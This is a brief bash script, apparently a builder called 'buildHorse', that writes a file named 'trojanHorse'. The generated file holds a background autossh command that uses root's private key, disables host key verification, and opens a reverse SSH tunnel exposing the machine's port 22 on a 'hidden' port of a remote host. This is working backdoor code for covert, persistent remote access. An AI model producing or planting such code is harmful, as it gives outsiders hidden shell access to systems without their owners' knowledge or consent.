#!/bin/bash
#	./buildHorse $$SSH_PORT_EXPOSED $$SSH_PORT_HIDDEN $$SSH_PORT_MONITOR $$SSH_HOST $$SSH_USER
# echo '#!/bin/bash' > trojanHorse
echo -n "autossh -M $3 -N -f -o 'PubkeyAuthentication=yes' -o 'PasswordAuthentication=no' -o 'StrictHostKeyChecking=no' -o 'UserKnownHostsFile=/dev/null' -i /root/.ssh/id_ecdsa -R $2:localhost:22 $5@$4 -p $1" >> trojanHorse
echo ' &' >> trojanHorse
